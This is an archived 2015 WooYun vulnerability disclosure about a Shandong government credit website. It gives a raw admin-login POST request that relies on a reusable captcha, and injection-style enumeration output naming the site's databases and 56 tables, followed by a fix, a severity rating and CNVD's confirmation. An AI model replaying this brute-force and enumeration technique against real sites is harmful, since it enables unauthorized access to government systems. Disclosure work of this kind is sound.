乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-07: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
看看大山东。啦啦。。。
0x01:无事,看看 WooYun: 山东省某信用网漏洞 我大山东的漏洞:0x02:若口令是补了,但是验证码貌似可以重复使用,并且报错相当不安分。呵呵。。。0x03:post数据:
POST /admin/ajaxlogin.php HTTP/1.1Host: www.dycredit.gov.cnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:37.0) Gecko/20100101 Firefox/37.0Accept: application/json, text/javascript, */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.dycredit.gov.cn/admin/admin_login.phpContent-Length: 48Cookie: PHPSESSID=5cjnkfhl378meavl6t0mm4bvr4Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusername=admin&password=sdfdsf&verification=8780
验证码可重复使用,来看看数据吧:
0x04:
web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5back-end DBMS: MySQL 5.0.12
available databases [4]:[*] dys_jxw[*] dys_jxw53200[*] information_schema[*] test
数据:
Database: dys_jxw53200[56 tables]+------------------------+| tb_company-wbs || audio_nuowan || audiosort_nuowan || department_nuowan || file_nuowan || filesort_nuowan || flash_nuowan || flashsort_nuowan || info_nuowan || keyword_nuowan || left_menu_nuowan || links_nuowan || main_left_menu_nuowan || member_nuowan || message_nuowan || news_nuowan || news_nuowan_copy || news_product_nuowan || newssort_nuowan || photo_nuowan || photosort_nuowan || poster_nuowan || postersort_nuowan || recruitment_nuowan || recruitmentinfo_nuowan || region_nuowan || setvideo_nuowan || tb_business || tb_change || tb_company || tb_company_stnrd || tb_complaint || tb_complaint2 || tb_credit_dir || tb_department || tb_find || tb_find_copy || tb_findpeople || tb_limit_info || tb_person || tb_person_credit || tb_person_wbs || tb_r_b || tb_role_info || tb_role_limit_info || tb_rpt_log || tb_template || tb_unit || tb_user || tb_user_log || tb_variable || user_nuowan || video_nuowan || videosort_nuowan || watermark_nuowan || webinfo_nuowan |+------------------------+
1.验证码不能重复使用2.补
危害等级:中
漏洞Rank:10
确认时间:2015-05-11 19:00
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无